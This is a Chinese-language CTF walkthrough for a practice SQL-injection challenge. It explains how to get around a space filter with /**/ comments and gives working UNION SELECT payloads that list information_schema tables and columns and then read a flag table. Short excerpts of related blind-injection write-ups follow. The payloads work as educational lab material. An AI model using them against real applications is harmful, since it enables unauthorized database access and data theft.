實驗吧Web 中 簡單的sql注入之2

2021-09-02 23:06:38 字數 696 閱讀 3438

輸入union select、order by這些關鍵字會提示sqli detected! 說明對於關鍵字有防護

輸入1 union也會提示sqli detected! 但是如果去掉空格:1union,則會返回正常,1'and'1'='1(無空格)也返回正常

所以可能是過濾了空格。

於是用/**/ 或++代替掉空格。

1'/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/'1'='1

後面單獨的'用了閉合掉乙個'號

最下面看到flag表,於是再用1'/**/union/**/select/**/column_name/**/from/**/information_schema.columns/**/where/**/table_name='flag    得到

得到flag這個column,再查詢其內容:1'/**/union/**/select/**/flag/**/from/**/flag/**/where/**/'1'='1

就拿到flag了。

實驗吧 簡單的SQL注入2

首先輸入1,發現有將資料庫的查詢結果顯示出來 輸入單引號,發現錯誤,這時候可以猜測後台查詢語句 select name from table where id 可以先嘗試萬能密碼 查詢語句就變成 select name from table where id 會把所以結果都顯示出來一共三條記錄 接下...

實驗吧 簡單sql注入之3

簡單sql注入之3 以下皆根據布林盲注手工注入步驟並且借助burpsuite的intruder功能對資料庫名 表名等等進行爆破 需要注意 0x00 爆資料庫 方法一 可以通過burpsuite攔截資料報,更改ascii值重發獲取 1 and length database n 資料庫名長度是4 1 ...

實驗吧 CTF 簡單的sql注入思路

我們先用單引號測試 頁面錯誤 再加個單引號 頁面正常 那初步判斷語句應該是 select from xx where id 然後我們測試下我們滲透經常用的關鍵字有沒有被過濾 or and select union 1,2,3 information schema.tables information...